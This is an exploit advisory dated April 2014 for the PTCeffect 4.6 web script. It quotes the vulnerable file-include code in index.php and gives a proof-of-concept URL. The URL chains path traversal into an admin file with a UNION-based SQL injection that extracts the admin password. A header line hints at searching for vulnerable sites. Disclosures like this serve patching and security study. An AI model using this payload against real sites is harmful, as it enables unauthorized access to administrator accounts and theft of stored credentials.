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PTCeffect 4.6 - Local File Inclusion / SQL Injection

🗓️ 19 Apr 2014 00:00:00Reported by walid naceriType 
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PTCeffect 4.6 has LFI and SQL Injection vulnerabilities allowing unauthorized access to admin files.

Code
# Exploit Title: PTCeffect LFI & SQL Injection Vulnerabilities 
# Google Dork: find it :)
# Date: 2014-04-19
# Exploit Author: Walidz
# Software Link: http://www.ptceffect.com/ 
# Version: 4.6
# Tested on: windows,linux,mac os
# CVE : N/A

The LFI vulnerability is in index.php
 
--------------------[index.php]--------------------
 
if ($input->g['view']) {
        $filename = strtolower($input->g['view']) . ".php";
 
[...]
 
 
include SOURCES . $filename;
 
 
--------------------[index.php]--------------------
 
So you can include a fil by doing ; http://[site]/index.php?view=[file]
 
 
By using the LFI, you can also include "admin files" which are especially unsecure, and let you inject SQL queries.
 
As the file admin/sources/edit_loginad.php
 
 
PoC ; http://[site]/index.php?view=../admin/Sources/edit_loginad&edit=-1%20union%20select%201,2,3,4,%28SELECT%20password%20FROM%20admin%29,6,7,8,9--%20-
 
 
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